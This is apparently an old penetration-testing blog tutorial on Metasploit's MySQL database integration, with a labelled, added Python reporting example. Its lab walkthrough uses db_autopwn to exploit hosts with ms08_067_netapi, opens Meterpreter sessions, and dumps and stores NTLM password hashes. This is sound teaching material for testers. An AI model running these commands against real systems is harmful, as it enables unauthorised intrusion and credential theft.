Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
root@bt:~# msfconsole
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ ----=[635 exploits - 316 auxiliary
+ ----=[215 payloads - 27 encoders - 8 nops
=[svn r11078 updated today (2010.11.19)
msf > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql, mysql, sqlite3
We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*] Usage: db_connect @/
[*] OR: db_connect -y[path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3
In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.
msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus
After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.
msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a ] [-c ] [-o output-file ]
-a Search for a list of addresses
-c Only show the given columns
-h,--help Show this help information
-u,--up Only show hosts which are up
-o Send output to a file in csv format
Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at
msf > db_hosts -c address,mac
Hosts
=====
address mac
------- ---
192.168.69.100 00:0C:29:DE:1A:00
192.168.69.105 00:0C:29:9A:FC:E0
192.168.69.110 00:0C:29:69:9C:44
192.168.69.130 00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141 00:0C:29:F3:40:70
192.168.69.142 00:0C:29:57:63:E2
192.168.69.143 00:0C:29:32:29:79
192.168.69.146
192.168.69.171 00:0C:29:EC:23:47
192.168.69.173 00:0C:29:45:7D:33
192.168.69.175 00:0C:29:BB:38:53
192.168.69.199 00:0C:29:58:09:DA
192.168.69.50
Far more interesting than IP and MAC addresses is which services are running on our target systems, and that is what db_services shows us.
msf > db_services -h
Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ]
-a Search for a list of addresses
-c Only show the given columns
-h,--help Show this help information
-n Search for a list of service names
-p Search for a list of ports
-r Only show [tcp|udp] services
-u,--up Only show services which are up
Available columns: created_at, info, name, port, proto, state, updated_at
msf > db_services -c name,port,proto
Services
========
name port proto Host Workspace
---- ---- ----- ---- ---------
192.168.69.100 123 udp 192.168.69.100 default
192.168.69.100 135 tcp 192.168.69.100 default
192.168.69.100 137 udp 192.168.69.100 default
192.168.69.100 139 tcp 192.168.69.100 default
192.168.69.100 445 tcp 192.168.69.100 default
192.168.69.100 3389 tcp 192.168.69.100 default
192.168.69.105 123 udp 192.168.69.105 default
...snip...
Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.
msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
...snip...
For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution...
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution...
In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.168.69.140:54342 -> 192.168.69.105:34160
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT 192.168.69.140:53895 -> 192.168.69.100:30423
Running db_exploited now will list not only the hosts that were exploited but also the port and exploit that was successful against them.
msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.
Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >
All of these database features are very powerful and exciting but just as exciting is that your entire session is now available with MYSQL.
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_msf3 |
+-----------------------------+
| attachments |
| attachments_email_templates |
| campaigns |
| clients |
| creds |
| email_addresses |
| email_templates |
| events |
| exploited_hosts |
| hosts |
| imported_creds |
| loots |
| notes |
| project_members |
| refs |
| report_templates |
| reports |
| schema_migrations |
| services |
| tasks |
| users |
| vulns |
| vulns_refs |
| web_forms |
| web_pages |
| web_sites |
| web_templates |
| web_vulns |
| wmap_requests |
| wmap_targets |
| workspaces |
+-----------------------------+
31 rows in set (0.00 sec)
We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.
mysql> select * from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name | payload | created_at | updated_at |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| 1 | 14 | 131 | oc5vd2zl | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
| 2 | 15 | 137 | qwtwtqfj | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows in set (0.00 sec)
mysql> select * from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at | updated_at |user | pass | active | proof | ptype | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| 1 | 131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: | 1 | NULL | password | NULL | NULL |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 row in set (0.00 sec)
mysql>
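The kind of reporting query the session above makes possible, as an added example that is not part of the original post: it builds an in-memory SQLite copy of a constructed subset of the msf3 tables shown above, joins exploited_hosts to hosts, services and creds for a per-host summary, and flags credential rows that are really whole hashdump lines. hosts.id and services.host_id are assumed link columns (the post never prints them); every other column name appears in the output above.

```python
import re
import sqlite3
# Stand-in for the msf3 tables named in the post. hosts.id and services.host_id
# are assumed link columns (never printed in the post); all other columns are.
SCHEMA = """
CREATE TABLE hosts (id INTEGER PRIMARY KEY, address TEXT, mac TEXT);
CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER, port INTEGER, proto TEXT, name TEXT);
CREATE TABLE exploited_hosts (id INTEGER PRIMARY KEY, host_id INTEGER, service_id INTEGER,
                              session_uuid TEXT, name TEXT, payload TEXT);
CREATE TABLE creds (id INTEGER PRIMARY KEY, service_id INTEGER, user TEXT, pass TEXT,
                    active INTEGER, ptype TEXT);
"""
# Constructed sample rows reusing the ids, addresses and ports shown in the post.
EXPLOIT = "exploit/windows/smb/ms08_067_netapi"
PAYLOAD = "payload/windows/meterpreter/bind_tcp"
SAMPLE_ROWS = {
    "hosts": [(14, "192.168.69.105", "00:0C:29:9A:FC:E0"),
              (15, "192.168.69.100", "00:0C:29:DE:1A:00")],
    "services": [(131, 14, 445, "tcp", "smb"), (137, 15, 445, "tcp", "smb")],
    "exploited_hosts": [(1, 14, 131, "oc5vd2zl", EXPLOIT, PAYLOAD),
                        (2, 15, 137, "qwtwtqfj", EXPLOIT, PAYLOAD)],
    "creds": [(1, 131, "Administrator", "Administrator:500:7bf4f254b222bb24aad3b4"
               "35b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::", 1, "password")],
}
# user:rid:LMhash:NThash::: is the hashdump line format, not a password.
HASHDUMP_RE = re.compile(r"^[^:]+:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::$")

def load_sample_db():
    """Build an in-memory SQLite copy of the constructed msf3 subset."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    return conn

def exploited_host_report(conn):
    """Address, port, proto, exploit module and credential count per exploited host."""
    return conn.execute("""
        SELECT h.address, s.port, s.proto, e.name, COUNT(c.id)
        FROM exploited_hosts e
        JOIN hosts h ON h.id = e.host_id
        JOIN services s ON s.id = e.service_id
        LEFT JOIN creds c ON c.service_id = s.id
        GROUP BY e.id ORDER BY h.address""").fetchall()

def creds_needing_cleanup(conn):
    """'password' rows that are really whole hashdump lines, as db_add_cred stored above."""
    return [(u, p) for u, p, t in conn.execute("SELECT user, pass, ptype FROM creds")
            if t == "password" and HASHDUMP_RE.match(p)]
```

The same SELECT runs unchanged against the real msf3 database in the mysql client; the cleanup check is worth running before a report so hashes are not presented as plaintext passwords.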
At first glance, database integration may not seem that compelling, but it opens the door for the community to develop customized reporting applications on top of a database as widely used as MySQL, easing the post-penetration-test reporting burden.
For further details on setting up and using the various databases in Metasploit, check out the Configuring Databases and Using the MSF Database sections in Metasploit Unleashed.